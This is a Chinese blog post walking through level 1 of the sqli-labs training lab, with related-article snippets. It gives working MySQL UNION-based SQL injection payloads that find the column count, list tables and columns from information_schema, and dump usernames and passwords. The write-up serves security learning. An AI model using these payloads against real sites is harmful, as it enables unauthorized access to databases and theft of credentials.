sqlilabs通关——第一关

最新推荐文章于 2024-08-14 21:05:20 发布
最新推荐文章于 2024-08-14 21:05:20 发布
阅读量310 收藏 1
点赞数
分类专栏: web安全学习笔记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuzhen9828/article/details/120424235
版权

在这里插入图片描述
从上边的页面提示中可以看出,ID是其参数

1.判断漏洞

  1. 首先根据题目就可以知道这是一个单引号字符型注入漏洞
  2. 其次我们可以进行手工判断,输入id=1 and 1=2发现页面显示正常,说明肯定不是数字型,输入id=1'发现页面错误,但是有一个提示limit 0,1'说明后边的单引号没有闭合造成了错误,这就可以说明这是一个单引号引起的漏洞。输入id=1'--+页面正常。

2.漏洞利用

漏洞利用的思路和常规的MySQL一样,为了练习,这里使用手工注入。

  1. 判断字段数
    id=1' order by 3--+页面显示正常,id=1' order by 4--+页面显示错误,说明字段数为3
  2. 爆数字
    id=-1' union select 1,2,3--+页面爆出数字2 3
    在这里插入图片描述
  3. 爆表名
    id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
    在这里插入图片描述
  4. 爆列名
    id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    在这里插入图片描述
  5. 爆数据
    id=-1' union select 1,username,password from users limit 1,1--+
    在这里插入图片描述
    通过limit m,1来实现全部数据的查询。
Hold on Faith
关注
专栏目录
sqli-labs第一关
qq_51366383的博客
12-06 479
一、sqli-labs第一关 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 2、判断闭合符 通过输入’和" 可以判断这关的闭合符为’ 3、查询字段数量 字段数为3 4、确认占位信息 5、查看信息 数据库 表名 列名 数据 二、自己上课的笔记 一、有回显之联合注入 union select 加-1是前面是错的,才 页面回显位回显数据 条件:有回显,知道前表字段数 1、获取数据库名 select distinct table_schema from in
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1725
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs--第一关
wyzhxhn的博客
11-05 490
sqli-labs靶场第一关
sqli-labs靶场通关攻略
test_zpx的博客
08-14 547
Good Good Study,Day Day Up!
SQLi-Labs SQL注入练习平台(第一关)
banyang6297的博客
01-18 367
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。-----百度百科   我用的是看...
sqli-labs靶场第一关
A_450的博客
12-12 1104
sqli-labs靶场第一关
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 5021
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1951
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1470
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs 1——20关攻略
weixin_45880717的博客
01-18 1225
1~10 GET传输 Less-1联合查询[ ’ ] 优点:查询方便 速度很快 缺点:必须要有显示位 1、判断sql语句中一共返回了多少列 order by 3 --+ 对比如下两张图的显示页面。得知有3列 2、查看显示位 union select 1,2,3 --+ 3、爆数据 union select 1,2,database() ## 当前数据库名 4、爆库名 union...
Sqli-labs靶场第8关详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1188
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
sqli_labs第一关
weixin_30924087的博客
03-25 209
安装 从https://github.com/Audi-1/sqli-labs下载源代码 搭建环境用的是phpstudy 编辑sqli\sql-connections\db-creds.inc文件 修改mysql链接数据库帐号密码。 为了方便看见sql语句,在$sql这句话下面添加echo...这句。 $sql="SELECT * FROM users WHERE id='...
sqli-labs 第一关
weixin_48800344的博客
08-31 800
sql注入大体解释 通过构造闭合语句来执行想要执行的命令 第一关 推荐工具 HackBar 为什么不用url输入,做着做着就不知道代码那里出错了,用hackber方便简洁,其实url输入也行 第一步:判断什么型的注入 1.判断是什么型注入就要看给他错误语句是否报错 例如:判断什么型注入直接看1’ and 1=2# 1 and 1=2#那个会报错 详细因为当运行可执行指令中假如程序有错误语句会报错,如果可执行程序中有错误语句但没报错就可以看出来了 我是这么理解的,希望有更好的解释 [外链图片转存失败
sqli-labs第1关
weixin_45626840的博客
04-23 242
草草写的一篇记录文章 概念 SQL注入就是将恶意代码拼接到业务正常的数据库查询,造成数据库信息泄露等危害。 我觉得 要弄懂SQL注入,需要一点计网的知识,最好知道Web开发的整个流程,中间用了哪些技术,为什么需要这种技术。当然,你首先得懂得数据库以及SQL查询,并且程序设计语言和SQL语言之间的结合(推荐一本书《数据库系统概论》)。有了这些基础,SQL注入就自然而然会懂的。 通关思路 输入id,登录正常 尝试闭合语句 单引号报错,推测后端查询语句为: select * from table where
sqli-labs第一关(MySql基础)
Carrot_kexin的博客
10-09 191
url中#号无效,在url中使用%23代替#,或使用两个减号--代替注释,注意两个减号后常根一个加号+,被解析为空格,以注释掉后面的引号完成闭合 字符串中所有字符都可以使用16进制输入(需要加0x) 探测有多少列:localhost/sqli-labs-master/Less-1/?id=1' order by 2--+,通过order by来探测列数 利用group_concat来在一行内显示多个信息 探测union注入:localhost/sqli-labs-master/Less-..
sqli-labs---第一关
2201_75556700的博客
05-10 197
4、查看这3列中哪几列会在页面显示 (由于写入id=整形数值,会出现先对应的name和password,所以这里我们构造id=字符)结果:第2,3列会显示在页面是上。7、接着查询users 表中的字段,得到了表中的字段,可以看到username,password里面的信息可能是我们想要的。8、查询users表中字段里面的信息(在这里加上id是为更好的分隔开用户名和密码),最终我们拿到了用户名和密码。6、 接着是查询该库中的表名,可能有多张表,这里有4张表,我们猜测重要数据会在users表中。
sqli-labs系列——第一关
1匹黑马
04-26 3978
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
sqli-labs通关6关
最新发布
09-05
通关第6关,通常需要了解以下内容: 1. SQL注入基础知识:了解SQL注入是什么,以及它如何工作。 2. 数据库结构和查询语言:熟悉目标数据库(如MySQL)的结构、表和字段,以及如何构造有效的SQL查询。 3. 常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值